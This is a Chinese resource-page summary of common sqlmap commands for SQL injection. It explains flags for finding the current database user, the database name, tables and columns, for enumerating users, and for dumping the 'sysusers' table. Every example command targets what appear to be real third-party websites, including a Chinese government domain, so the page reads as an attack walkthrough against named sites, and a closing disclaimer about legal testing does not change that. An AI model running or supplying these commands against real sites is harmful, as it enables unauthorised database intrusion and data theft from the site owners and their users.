SQLMap实战:常用命令详解
4星 · 超过85%的资源 需积分: 14 184 浏览量
更新于2024-09-12
收藏 9KB TXT 举报
"这篇文档提供了一些sqlmap工具的常用命令示例,用于SQL注入攻击,包括获取当前用户、数据库、表名、列名以及数据的提取。此外,还提到了智能检测级别和指定DBMS类型来查找用户的方法。"
sqlmap是一款强大的自动化SQL注入工具,它可以帮助安全研究人员或渗透测试者检测和利用网站应用程序中的SQL注入漏洞。以下是对标题和描述中所涉及的sqlmap常用语句的详细解释:
1. `sqlmap -u "http://www.hldcredit.gov.cn/Article/ShowArticle.asp?ArticleID=1705" --current-user`
这个命令用于获取目标URL所使用的数据库系统的当前登录用户。`--current-user`参数是用于查询服务器上的当前数据库连接用户。
2. `sqlmap -u "http://www.hldcredit.gov.cn/Article/ShowArticle.asp?ArticleID=1705" --current-db`
此命令用于识别与给定URL相关的数据库名称。`--current-db`参数用来获取当前连接的数据库名。
3. `sqlmap -u "http://www.bxjiajia.com/cn/product.asp?id=4" --current-user --tables -D "admin"`
这个命令结合了两个功能:获取当前用户并列出名为“admin”的数据库中的所有表格。`--tables`参数用于列出数据库中的表。
4. `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --columns -T "sysusers" -D "master" -v0`
这个命令用于显示在数据库“master”中的“sysusers”表的所有列名。`--columns`参数用于获取表中的列,`-T`指定表名,`-D`指定数据库名,`-v0`用于降低输出的详细程度。
5. `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --dump -C "name" -T "sysusers" -D "master" -v0`
这个命令将从“master”数据库的“sysusers”表中提取出“name”列的所有数据。`--dump`用于提取数据,`-C`指定了列名。
6. 信息获取部分:
- `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --smart --level 3 --users`
这里使用`--smart`参数启动智能检测模式,`--level 3`设置检测级别为3(中等),`--users`则用于查找数据库中的所有用户。
- `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --dbms "Mysql" --users`
通过指定数据库管理系统(这里是MySQL)来查找其用户。
- `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --users`
直接查找与给定URL关联的数据库系统的所有用户,不指定特定的DBMS。
这些命令展示了sqlmap在SQL注入过程中可以执行的各种操作,包括信息收集、数据探测和数据提取。在实际使用时,应确保遵循合法的测试原则,避免非法入侵他人系统。
点击了解资源详情
点击了解资源详情
点击了解资源详情
2023-06-08 上传
2020-04-29 上传
2021-02-02 上传
2019-09-18 上传
2023-09-07 上传
2024-05-14 上传
liudfd
- 粉丝: 0
- 资源: 1
最新资源
- JHU荣誉单变量微积分课程教案介绍
- Naruto爱好者必备CLI测试应用
- Android应用显示Ignaz-Taschner-Gymnasium取消课程概览
- ASP学生信息档案管理系统毕业设计及完整源码
- Java商城源码解析:酒店管理系统快速开发指南
- 构建可解析文本框:.NET 3.5中实现文本解析与验证
- Java语言打造任天堂红白机模拟器—nes4j解析
- 基于Hadoop和Hive的网络流量分析工具介绍
- Unity实现帝国象棋:从游戏到复刻
- WordPress文档嵌入插件:无需浏览器插件即可上传和显示文档
- Android开源项目精选:优秀项目篇
- 黑色设计商务酷站模板 - 网站构建新选择
- Rollup插件去除JS文件横幅:横扫许可证头
- AngularDart中Hammock服务的使用与REST API集成
- 开源AVR编程器:高效、低成本的微控制器编程解决方案
- Anya Keller 图片组合的开发部署记录